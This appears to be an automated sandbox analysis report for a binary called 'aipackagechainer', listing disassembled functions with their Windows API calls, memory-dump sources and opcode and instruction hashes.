EnumSystemLocalesW.KERNEL32(0028D46E,00000001,002D3940,0000000C,0028D8BE,00000000), ref: 0028D4B3

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 1f60c8f59c4555c3a3a5815bbafa13068cd250134bae91a97cc8560b4540eb7a
Instruction ID: 6b93b393ebe5ca73949bbbecde3bbfddd57b07ebc6d183d57c1bd552be7b8b4a
Opcode Fuzzy Hash: 1f60c8f59c4555c3a3a5815bbafa13068cd250134bae91a97cc8560b4540eb7a
Instruction Fuzzy Hash: E5F01436A11204EFDB00EFA8E846B9977F0FB09721F00822AE4059B2E1DB7559148F41

Function 0029685D Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

EnumSystemLocalesW.KERNEL32(002967B6,00000001,00000000,?,?,00297021,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00296894

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 764701edf7a5abe8977c77b469eec299e274e63195c089c53532843c3558cffa
Instruction ID: 29706212cabb1ef45d1f28ce13a24e83c0761dca8e4f26f0bc2a836f16210e76
Opcode Fuzzy Hash: 764701edf7a5abe8977c77b469eec299e274e63195c089c53532843c3558cffa
Instruction Fuzzy Hash: 00F0E53A71020697CF04AF75DA49A6ABFD4FFC2714B0A4059FB098B690D671E952CB90

Function 0028D9C2 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0028C719,?,20001004,00000000,00000002,?,?,0028BD1B), ref: 0028D9F6

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c59b00698a95d3552d493939727837607b94109a4741ea8b5ae2cf322e88acc5
Instruction ID: 407b708de2c4f14aff27cbff573609168e35b1068d5e12d22ded8bb098b40d7e
Opcode Fuzzy Hash: c59b00698a95d3552d493939727837607b94109a4741ea8b5ae2cf322e88acc5
Instruction Fuzzy Hash: 83E01A36511228BBCF123F61EC09A9E3F2AEB45761F014021FD05661E1CB728D35ABA1

Function 0027D1D0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0006D1DC,0027CA9C), ref: 0027D1D5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c797b9288e71140248973e5b0f1948f2307542887424ae315eac8e4af0d81245
Instruction ID: 2f93307d3d861a5f8e78df6f57bb4f9f26abc4a4044e79aab52a630d2a3682c7
Opcode Fuzzy Hash: c797b9288e71140248973e5b0f1948f2307542887424ae315eac8e4af0d81245
Instruction Fuzzy Hash:

Function 00215410 Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e861c549485384c768f670e5fb67551579717d59833868d832c588fdb365086a
Instruction ID: 1648185063842bbb8982d47b7d90fed2e81864de9ea24e32dd5753526683e16b
Opcode Fuzzy Hash: e861c549485384c768f670e5fb67551579717d59833868d832c588fdb365086a
Instruction Fuzzy Hash: 5D22B4B7B547144BD70CCE1DCCA23A9B2D3ABD4218F0E853DB48AC3345EA7DD9198685

Function 002910D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 483cc768b8f9b22bb6b46f9dfd7a8f5152098d64a501b502f8853c82e2804161
Instruction ID: 4033797cff56b3f61e29ef0ffc7a1c9626d52bf08b9b188c646a566eaa602b60
Opcode Fuzzy Hash: 483cc768b8f9b22bb6b46f9dfd7a8f5152098d64a501b502f8853c82e2804161
Instruction Fuzzy Hash: 3E320221D39F034DEB239635DD26335A24DAFB73C5F15DB27E81AB5AA6EB28C4934100

Function 00274E30 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e67e8de01a0fd7d1a6601acb1c3b27d2fa1beb8382696a4be710fdfd727f7e80
Instruction ID: cd9a78ef616126cb2cee4a2fd043b371076a20030b6b50889204c7efaabce942
Opcode Fuzzy Hash: e67e8de01a0fd7d1a6601acb1c3b27d2fa1beb8382696a4be710fdfd727f7e80
Instruction Fuzzy Hash: 0522BC71A106269FDB25DFA8C884BAEFBB1FF44310F148169E809AB351C771ED51CB90

Function 00274F50 Relevance: .6, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2638649f79bcb35581ffb90d6941a8dc2d6f613db3f6eda41e23b5dd1883aec2
Instruction ID: 6940f474d6fb616bad926bcf44819c7982760afc0f43c2ee0f752b144776c194
Opcode Fuzzy Hash: 2638649f79bcb35581ffb90d6941a8dc2d6f613db3f6eda41e23b5dd1883aec2
Instruction Fuzzy Hash: BB227C71A10629DFDB15DFA8C884BAEFBB1BF48300F158198E819AB351C7B5ED51CB90

Function 00270CE0 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09a49bf1fc0ad1753b1a6a460b42467e9f6da1ba1218da342d7813e9e4fced52
Instruction ID: 9cdc74e0593261fdfaad72b4ae637be65ef085904e573151e4cb34610d845506
Opcode Fuzzy Hash: 09a49bf1fc0ad1753b1a6a460b42467e9f6da1ba1218da342d7813e9e4fced52
Instruction Fuzzy Hash: 1002B571B282618BDB1CCE1DC49022DBBE2BFC8305F154A2DE49AD7385C674D959CB85

Function 00286067 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a301b9bd88930e887084cb6b1e3328c99db42748b3d148724f88868a5bef5979
Instruction ID: 0593b4051a9d68dd48a9d57f235ff1f687f79ec0d3a60f07a6a51e61595ad738
Opcode Fuzzy Hash: a301b9bd88930e887084cb6b1e3328c99db42748b3d148724f88868a5bef5979
Instruction Fuzzy Hash: 46E1FD38A226068FCB24EF68C588A6EB7F1FF45314F248659D45A9B3D2C731EC65CB11

Function 00276C60 Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e1126cfc428847dbd3011ba09e6e60f02ba00fbeff50f9f4f2c17ce95f67a5
Instruction ID: f0e196c01d368266a25d0c42fed39e9bd7707240ced5bf662bc57b3605d235f2
Opcode Fuzzy Hash: 75e1126cfc428847dbd3011ba09e6e60f02ba00fbeff50f9f4f2c17ce95f67a5
Instruction Fuzzy Hash: F5F162709142518FD308CF1AE8A483AB7E1FBC9305F458A1FF99697391C734EA1ADB61

Function 00285CD9 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01fc0bf0d6059433a31d5f67154ea2589930fe965c37db0954c8c81e7d92a33a
Instruction ID: 6f5dc9f0a1cce309ec51839420d3483f3d7101bc118953c2f9a5341e05205897
Opcode Fuzzy Hash: 01fc0bf0d6059433a31d5f67154ea2589930fe965c37db0954c8c81e7d92a33a
Instruction Fuzzy Hash: 40C1167C522A578FCB28EF28C4886BEB7F1BF05300F244519D9569B6D1D730AD66CB50

Function 0021E220 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a1f53c06cf7c2f27892348544cabf4affe63a0880d2d6eba168e75056f8d92
Instruction ID: bb6eaccb01348e05cca9a26f80a05e6b7e17419c16e39bdb354518bed99a3a53
Opcode Fuzzy Hash: 23a1f53c06cf7c2f27892348544cabf4affe63a0880d2d6eba168e75056f8d92
Instruction Fuzzy Hash: 2A719072E2011A8FDF08CF98C8916FEB7F1FB58310F168269DD16EB244D670A991CB94

Function 0021E470 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2833fc6e0a6d5e46ee723946e33b696591b78610653d7872e6390278fdd38cdd
Instruction ID: ac8d5f64fb54d298582d981f3c816aab6971520a9e06f3c2e585e65c55d09b26
Opcode Fuzzy Hash: 2833fc6e0a6d5e46ee723946e33b696591b78610653d7872e6390278fdd38cdd
Instruction Fuzzy Hash: 7161B4716242069FCB14CF1DC84066AB7E6EFF4354F5A892DE896C7254E730E9A4CB81

Function 002766B0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6a5bc58de809013063d6a2681a055a54a9f030fd3cdf8c7f79c10b0e74bf7e
Instruction ID: 23191771c0500ffd2839668a93d7c9812bd2feb914881bb6c39ca6b7941dc575
Opcode Fuzzy Hash: ca6a5bc58de809013063d6a2681a055a54a9f030fd3cdf8c7f79c10b0e74bf7e
Instruction Fuzzy Hash: E2416B72B18A620FCB188E2C8CD8169F6D2DBD1364F4AC77DD89A97785C5748C1DC790

Function 00276AB0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6b8b718d63339a35d220de1d1af407bb4dd88d7379f243e4c178477013f4fd
Instruction ID: e51b874ba64e83ebdebdcfb40aa1ae7dc066627049aaee0641418be013cd2ec3
Opcode Fuzzy Hash: dd6b8b718d63339a35d220de1d1af407bb4dd88d7379f243e4c178477013f4fd
Instruction Fuzzy Hash: 8E3159316145B60FE7108E6E8C44539BAD5DFC2301B5882FAF8E8EB352D279D906D7B0

Function 00266BA0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eaeab68c97d6d513ef16af95d17d84f199c78a7348926b2462966469425d11f
Instruction ID: 7c5e359f7f251c90beabfa1e13d4c73f689acc56322e5a26b2b284fd0a5f5410
Opcode Fuzzy Hash: 3eaeab68c97d6d513ef16af95d17d84f199c78a7348926b2462966469425d11f
Instruction Fuzzy Hash: B321933673090A4B9B4CCA29EC7AA7933D1E384305749D27EE95BC7695D7388821C740

Function 00273030 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3395c45eef9510d8e6ba7a1e4d1d4521fa8a1af8b18e96eb7d1c28856ff8121
Instruction ID: a3152a00c8fff2d07cc9a5fff902cf53e67da63ee406a682113cf89b3289f6ab
Opcode Fuzzy Hash: f3395c45eef9510d8e6ba7a1e4d1d4521fa8a1af8b18e96eb7d1c28856ff8121
Instruction Fuzzy Hash: 1A21B0315202339BD21ACE1EC8445B6F795FB85306F81C32AED84DB289C639E935D7E0

Function 00272F90 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e12790dad87ec2532e809a9eef8ff034ad4c78d338c3fea1aea289e885726f6
Instruction ID: 920d3a50d25492c2dd17b12a7a956ec36b260099e2f5667d29d975e4d897d262
Opcode Fuzzy Hash: 9e12790dad87ec2532e809a9eef8ff034ad4c78d338c3fea1aea289e885726f6
Instruction Fuzzy Hash: 4D116B325201324BD72ACD2CC884676B7A5EB82310F86C326DD85EB149C639FC39D7E0

Function 0028F94C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4028d74f7b1cc9dfd6c1d43f1826b563a64bb9ada68f2b5a76712271d2319dc
Instruction ID: f39ac2804be97dbb8da7be2fd229a25716cf50ca209309072918272742f306eb
Opcode Fuzzy Hash: f4028d74f7b1cc9dfd6c1d43f1826b563a64bb9ada68f2b5a76712271d2319dc
Instruction Fuzzy Hash: 98F06531A32228EFCB26DB4DD506B59B3ACEB49B61F514066F545D7290C670EE50CBD0

Function 0028F990 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 927bd4ffbdd7e72436beec622101bafa26e057f3d016b1e19f736927d408e671
Instruction ID: 684c248a4a9cfdd398cca2e0f1b61257e44ffb33104ca360dc981261d70ae9df
Opcode Fuzzy Hash: 927bd4ffbdd7e72436beec622101bafa26e057f3d016b1e19f736927d408e671
Instruction Fuzzy Hash: 90E0E677922238FBC715EBD8C544949F3ECE745B51B554466F501D3151C274DE14CBD0

Function 0028A795 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4393ba10a2c13102c7fd0adbb07cc65db380fc4ef8223aa8994ad5703ace5c8d
Instruction ID: b8fa43d52a0be02ff906e721404045f0725551d6c3cf40b76d38f1d38f50b7e1
Opcode Fuzzy Hash: 4393ba10a2c13102c7fd0adbb07cc65db380fc4ef8223aa8994ad5703ace5c8d
Instruction Fuzzy Hash: 64C08C7C12398046DE29ED2082713AC7374A391782F8014CDC8120B7C2C91E9C93EB42

Function 00260590 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 371filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,4938EAB5,?,00000000), ref: 002605F3
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 00260611
GetFileTime.KERNEL32(00000000,00000000,00000000,0025B28B,?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF), ref: 0026063E
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 00260648
FileTimeToSystemTime.KERNEL32(0025B28B,002C1958,?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?), ref: 002606CD
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 002606D7
SystemTimeToFileTime.KERNEL32(002C1958,0025B28B,?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?), ref: 0026070F
SystemTimeToFileTime.KERNEL32(002C1946,002BBA4C,?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?), ref: 00260730
CompareFileTime.KERNEL32(002BBA4C,0025B28B,?,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?), ref: 00260742
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 002607DF
CreateFileW.KERNEL32(?,C0000000,00000000,0000000C,00000002,00000080,00000000,S-1-5-18,?,00000001,S-1-1-0,?,00000001), ref: 0026084E
GetLastError.KERNEL32(?,00000001,S-1-1-0,?,00000001,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B), ref: 0026085E
CloseHandle.KERNEL32(00000000,?,00000001,S-1-1-0,?,00000001,?,?,?,?,?,?,?,002AA4CD,000000FF), ref: 00260866
CopyFileExW.KERNEL32(?,?,00260DB0,002C18F0,00000000,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF), ref: 002608C9
GetLastError.KERNEL32(?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 002608D3
DeleteFileW.KERNEL32(002C1520,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 00260944
MoveFileW.KERNEL32(?,002C1520), ref: 0026094E
